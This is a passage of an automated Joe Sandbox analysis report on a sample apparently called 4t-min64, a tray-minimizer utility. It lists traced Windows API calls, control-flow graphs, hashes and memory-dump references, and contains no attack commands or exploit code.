                                                                                                                                                                    • Associated: 0000002B.00000002.21462811966.000000001001B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21462902539.0000000010020000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_10000000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 4tTray_ProcessAttached$4tTray_ProcessDetached$4tTray_WM_FREEMEMORY_NAME$4tTray_WM_INIT_POS$4tTray_WM_POSCHANGED$4tTray_WM_ROLLUP$4tTray_WM_STAYONTOP
                                                                                                                                                                    • API String ID: 0-747308701
                                                                                                                                                                    • Opcode ID: 888b09190665d7b325f6165f59068ff50660990b4890c756fdafb3c0929ced85
                                                                                                                                                                    • Instruction ID: 4ea0fd74f3ecf19604ee4c34eb9aebb8153ca0ad136211d7458c0ca4e6443df7
                                                                                                                                                                    • Opcode Fuzzy Hash: 888b09190665d7b325f6165f59068ff50660990b4890c756fdafb3c0929ced85
                                                                                                                                                                    • Instruction Fuzzy Hash: D1F0F878A10250ADFB82EF6684523D935D0E7AC7C4F504439E586CB3B9DA74E4C14B52
                                                                                                                                                                    Function 00415470 Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: (C$HC$HC$hC$hC$hC
                                                                                                                                                                    • API String ID: 0-3076571172
                                                                                                                                                                    • Opcode ID: c42ecef10c86d41d04b4887b9898e82e0241f81536eb7ade0233eeea5a09e476
                                                                                                                                                                    • Instruction ID: 001708c26cf8127f2e59d6b1685c90da574dacee9bf51cf5bcec7886fa8d3e4b
                                                                                                                                                                    • Opcode Fuzzy Hash: c42ecef10c86d41d04b4887b9898e82e0241f81536eb7ade0233eeea5a09e476
                                                                                                                                                                    • Instruction Fuzzy Hash: 69F1B6B0716F44C4EB045B6AA8443EE36A2F3C9794F245927DE0A9B794DA2CC8C0D3DD
                                                                                                                                                                    Function 0042EEA0 Relevance: 6.7, Strings: 5, Instructions: 427COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002B.00000002.21459745592.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 0000002B.00000002.21459570104.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21459930438.0000000000438000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460069251.0000000000439000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460231796.000000000043A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460372647.000000000043B000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460535214.000000000043C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460690747.000000000043D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460833449.0000000000441000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21460962383.0000000000442000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461085431.0000000000444000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002B.00000002.21461219838.0000000000448000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_43_2_400000_4t-min64.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: `C$`C$`C$`C$pB
                                                                                                                                                                    • API String ID: 0-1295409263
                                                                                                                                                                    • Opcode ID: 02bad106980077c943e3b30c4cfeaa0c6d7e8f0ab3018f3a3cee3bc0ca3e092e
                                                                                                                                                                    • Instruction ID: 358ca444277d885a8e6d217304cf4b0f96eef9f63606b99305ab30c1fdbc5f6d
                                                                                                                                                                    • Opcode Fuzzy Hash: 02bad106980077c943e3b30c4cfeaa0c6d7e8f0ab3018f3a3cee3bc0ca3e092e
                                                                                                                                                                    • Instruction Fuzzy Hash: CB022676B10A2488EB10DBA6E8913ED2771F788B88F844477DF4D67B59CF38C5858398

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 03E345D8 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03E345F3
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E34611
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E3462F
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03E3464D
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03E34696
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,03E34858,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001), ref: 03E346B4
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,03E346E3,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E346D6
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03E346F3
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03E34700
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03E34706
                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 03E34731
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03E34786
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E34796
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03E347C2
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E347D2
                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E347FC
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03E3480C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                                    • Opcode ID: 0d4a8a7088d4b22792defebff3a3db9843fcba8d9a6a4c73311eb70cbc31bcbf
                                                                                                                                                                    • Instruction ID: 027d7748506c5a87c4e243fd0419d3990cb98108b6fbf369a26e7d6e62afc838
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d4a8a7088d4b22792defebff3a3db9843fcba8d9a6a4c73311eb70cbc31bcbf
                                                                                                                                                                    • Instruction Fuzzy Hash: FB617175E4034D7EEB20EAE5CC49FEFB7BCDB0A704F4452A5A604E6181DAB49A44CF60
                                                                                                                                                                    Function 03E3B054 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B11A
                                                                                                                                                                      • Part of subcall function 03E38C9C: IsBadReadPtr.KERNEL32(?,00000040), ref: 03E38CB0
                                                                                                                                                                      • Part of subcall function 03E38C9C: IsBadReadPtr.KERNEL32(03E3B1E5,00000004), ref: 03E38CDE
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B159
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,0000004A,00000001,0000C209,00000001,0000C208,00000001,0000C20A,00000001,0000C207,00000001,00000000,03E3B1E5), ref: 03E3B16E
                                                                                                                                                                    • PostMessageA.USER32(?,0000C20B,00000000,00000000), ref: 03E3B187
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,03E3B1E5), ref: 03E3B1A7
                                                                                                                                                                    • PostMessageA.USER32(?,0000C20C,00000000,00000000), ref: 03E3B1C0
                                                                                                                                                                      • Part of subcall function 03E38214: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,03E3B08F,00000000,03E3B1E5), ref: 03E3822B
                                                                                                                                                                      • Part of subcall function 03E39B94: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03E39BAF
                                                                                                                                                                      • Part of subcall function 03E39B94: OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 03E39BCC
                                                                                                                                                                      • Part of subcall function 03E39B94: GetLastError.KERNEL32(?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BDF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentFileProcess$MappingMessageModuleOpenPostRead$ErrorHandleLastName
                                                                                                                                                                    • String ID: iexplore.exe
                                                                                                                                                                    • API String ID: 3641758393-3286091477
                                                                                                                                                                    • Opcode ID: 52e32979198605c7c946ea97b6920a70de89d200ee60c6a32a10fd332e1806a7
                                                                                                                                                                    • Instruction ID: 90adf319c057bca9e01d0155c6122fdb93f864de824287b644fd7449e8fe0965
                                                                                                                                                                    • Opcode Fuzzy Hash: 52e32979198605c7c946ea97b6920a70de89d200ee60c6a32a10fd332e1806a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 88413B346043199FD701EBA9C88DFA9B7F5AF4A304F506690E402EF395D775E944CB21
                                                                                                                                                                    Function 03E39B94 Relevance: 9.1, APIs: 6, Instructions: 52fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03E39BAF
                                                                                                                                                                    • OpenFileMappingA.KERNEL32(00000004,00000000,00000000), ref: 03E39BCC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BDF
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39BF9
                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000074,00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39C1A
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000006,00000000,00000000,00000074,?,?,03E3B0B4,00000000,03E3B1E5), ref: 03E39C2D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLastMappingOpenView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3772272286-0
                                                                                                                                                                    • Opcode ID: 955202bbdf9164031bfcbaa687810c085dfa0075709cc7b9fe6902ae6864e669
                                                                                                                                                                    • Instruction ID: 9d5a6f2857757f7b8aeb8be148303497c667ebca04b670841a5710fa7b36e006
                                                                                                                                                                    • Opcode Fuzzy Hash: 955202bbdf9164031bfcbaa687810c085dfa0075709cc7b9fe6902ae6864e669
                                                                                                                                                                    • Instruction Fuzzy Hash: 55110374985368EAE710FB76AD4DB96B7E8E706714F182794E2825F2D5C7B43080CB14
                                                                                                                                                                    Function 03E319E4 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlInitializeCriticalSection.KERNEL32(03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E319FB
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(03E3D5C4,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A0E
                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A38
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E31AB3,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31AA6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 730355536-0
                                                                                                                                                                    • Opcode ID: 2a3538e0cdc6eb963358a54c81ca74006d2c8fb7d45df609565b63a1a36945c3
                                                                                                                                                                    • Instruction ID: b54c4fee93dce392a8a5e38fa1fec6ba3a19def9542bdaf68c07070a1b5fe2a0
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a3538e0cdc6eb963358a54c81ca74006d2c8fb7d45df609565b63a1a36945c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 611190B8A48218EFDB15FF66C80DB5ABBE0EB47705F00A36CE0148B280C6B45901DB54
                                                                                                                                                                    Function 03E39DC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 626 3e39dc8-3e39ded call 3e39c74 629 3e39e18-3e39e1e 626->629 630 3e39def-3e39e0c PostMessageA 626->630 630->629 631 3e39e0e-3e39e13 call 3e39e3c 630->631 631->629
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                      • Part of subcall function 03E39C74: LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                      • Part of subcall function 03E39C74: GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    • PostMessageA.USER32(?,?,?,?), ref: 03E39DFF
                                                                                                                                                                      • Part of subcall function 03E39E3C: GetCurrentProcessId.KERNEL32(03E39DA2,?,?,03E39DA2), ref: 03E39E63
                                                                                                                                                                      • Part of subcall function 03E39E3C: PostMessageA.USER32(?,?,00000000,03E39DA2), ref: 03E39E7B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadMessagePostProc$CurrentProcess
                                                                                                                                                                    • String ID: PostMessageA
                                                                                                                                                                    • API String ID: 3249817243-3140657398
                                                                                                                                                                    • Opcode ID: 1801b1fcd2227f6a76ff77341ef58b8fb4d8c986810065f0b9208045262a75ad
                                                                                                                                                                    • Instruction ID: 4f4b2d3ffbcbb2dfbf5db0aabf88008aa430137904cf40fc1a074618801ca8a5
                                                                                                                                                                    • Opcode Fuzzy Hash: 1801b1fcd2227f6a76ff77341ef58b8fb4d8c986810065f0b9208045262a75ad
                                                                                                                                                                    • Instruction Fuzzy Hash: DEF017B5E0121CAFCB00DFE9C848B9EB7F8AB0A200F1097A5B818E7341D3709A10CB91
                                                                                                                                                                    Function 03E32240 Relevance: 3.1, APIs: 2, Instructions: 125COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 633 3e32240-3e32250 634 3e32252 call 3e319e4 633->634 635 3e3225b-3e32261 633->635 639 3e32257-3e32259 634->639 637 3e32263-3e32268 635->637 638 3e3226d-3e32282 635->638 640 3e323e3-3e323ea 637->640 641 3e32284-3e32289 RtlEnterCriticalSection 638->641 642 3e3228e-3e32297 638->642 639->635 639->637 641->642 643 3e32299 642->643 644 3e3229e-3e322a4 642->644 643->644 645 3e32356-3e3235c 644->645 646 3e322aa-3e322ae 644->646 647 3e323b1-3e323b3 call 3e320f8 645->647 648 3e3235e-3e3236b 645->648 649 3e322b3-3e322c7 646->649 650 3e322b0 646->650 656 3e323b8-3e323cf 647->656 651 3e3237a-3e323af call 3e33724 648->651 652 3e3236d-3e32375 648->652 649->645 654 3e322cd-3e322ea 649->654 650->649 651->640 652->651 657 3e322fa-3e3231e 654->657 658 3e322ec-3e322f8 654->658 662 3e323d1-3e323d6 RtlLeaveCriticalSection 656->662 663 3e323db 656->663 661 3e32320-3e32351 call 3e33724 657->661 658->661 661->640 662->663
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E319E4: RtlInitializeCriticalSection.KERNEL32(03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E319FB
                                                                                                                                                                      • Part of subcall function 03E319E4: RtlEnterCriticalSection.KERNEL32(03E3D5C4,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A0E
                                                                                                                                                                      • Part of subcall function 03E319E4: LocalAlloc.KERNEL32(00000000,00000FF8,03E3D5C4,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31A38
                                                                                                                                                                      • Part of subcall function 03E319E4: RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E31AB3,00000000,03E31AAC,?,?,?,03E3240A), ref: 03E31AA6
                                                                                                                                                                    • RtlEnterCriticalSection.KERNEL32(03E3D5C4,00000000,03E323DC), ref: 03E32289
                                                                                                                                                                    • RtlLeaveCriticalSection.KERNEL32(03E3D5C4,03E323E3), ref: 03E323D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2227675388-0
                                                                                                                                                                    • Opcode ID: bd177c8c56c373aa99f941c02cd90d0a710ade592790609498dbd18502344499
                                                                                                                                                                    • Instruction ID: b03b6181135d3c88ea159908219dc6d75cc71924e0400ad241425dd562a5b5c9
                                                                                                                                                                    • Opcode Fuzzy Hash: bd177c8c56c373aa99f941c02cd90d0a710ade592790609498dbd18502344499
                                                                                                                                                                    • Instruction Fuzzy Hash: E3518BB5A04209DFCB10EFA9D988AAEF7F1FB8A304F149769D454A7344D330A941CF52
                                                                                                                                                                    Function 03E39F0C Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 666 3e39f0c-3e39f1d 667 3e39f40-3e39f53 CallNextHookEx 666->667 668 3e39f1f-3e39f3e CallNextHookEx 666->668 669 3e39f56-3e39f6c 667->669 668->669 670 3e39f72-3e39f7d 669->670 671 3e3a026-3e3a05c 669->671 670->671 672 3e39f83-3e39f8a call 3e399e0 670->672 672->671 676 3e39f90-3e39f94 672->676 677 3e39f96-3e39f99 676->677 678 3e39fd4-3e39ffb call 3e39d40 676->678 680 3e3a006-3e3a021 call 3e39dc8 677->680 681 3e39f9b-3e39f9c 677->681 678->671 686 3e39ffd-3e3a004 678->686 680->671 681->671 682 3e39fa2-3e39fc9 call 3e39d40 681->682 682->671 688 3e39fcb-3e39fd2 682->688 686->671 688->671
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,?,?,?), ref: 03E39F36
                                                                                                                                                                    • CallNextHookEx.USER32(00000000,?,?,?), ref: 03E39F4E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNext
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3378577984-0
                                                                                                                                                                    • Opcode ID: 23079eb4f0857048dd1b01a3ae1688861f1f9dbc1f5d4091a044a42897bda297
                                                                                                                                                                    • Instruction ID: b5e366564f323c351643d1b7519a08d3ebf7ce8602ce7b5476ded2fff8d4f7f2
                                                                                                                                                                    • Opcode Fuzzy Hash: 23079eb4f0857048dd1b01a3ae1688861f1f9dbc1f5d4091a044a42897bda297
                                                                                                                                                                    • Instruction Fuzzy Hash: 7D41F039204208EFDB10DF59E989EA973F9EB0A310F2492A1F905DB3A1D772E940CF10
                                                                                                                                                                    Function 03E31444 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 689 3e31444-3e31451 690 3e31453-3e31458 689->690 691 3e3145a-3e31460 689->691 692 3e31466-3e3147e VirtualAlloc 690->692 691->692 693 3e314a3-3e314a6 692->693 694 3e31480-3e3148e call 3e31268 692->694 694->693 697 3e31490-3e314a1 VirtualFree 694->697 697->693
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,03E317D7), ref: 03E31473
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,03E317D7), ref: 03E3149A
